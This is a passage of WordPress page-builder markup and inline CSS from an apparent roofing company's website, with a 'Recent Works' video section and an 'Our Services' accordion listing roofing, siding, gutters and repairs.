.skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">Our</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"d4365c9c-8542-4cda-bf8d-13d6a10eb2a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"b9c1ce98-590e-4510-a141-94e3d465168a\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"900cc149-4ce4-480a-b809-9965902c3d14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-900cc149-4ce4-480a-b809-9965902c3d14 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"97bb4af3-b9f2-4900-a022-a0913b0c7b78\"} -->\n<style type=\"text/css\"> .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"acd473cb-3709-457f-9421-929321d17166\"} -->\n<style type=\"text/css\"> .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-acd473cb-3709-457f-9421-929321d17166\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"4776dbfd-a2f7-456a-b568-581c1d04c6c0\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-4776dbfd-a2f7-456a-b568-581c1d04c6c0\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Guaranteed</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"1e53268c\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Roofing\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Siding\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Gutters\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Repairs\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-1e53268c skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-1e53268c {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 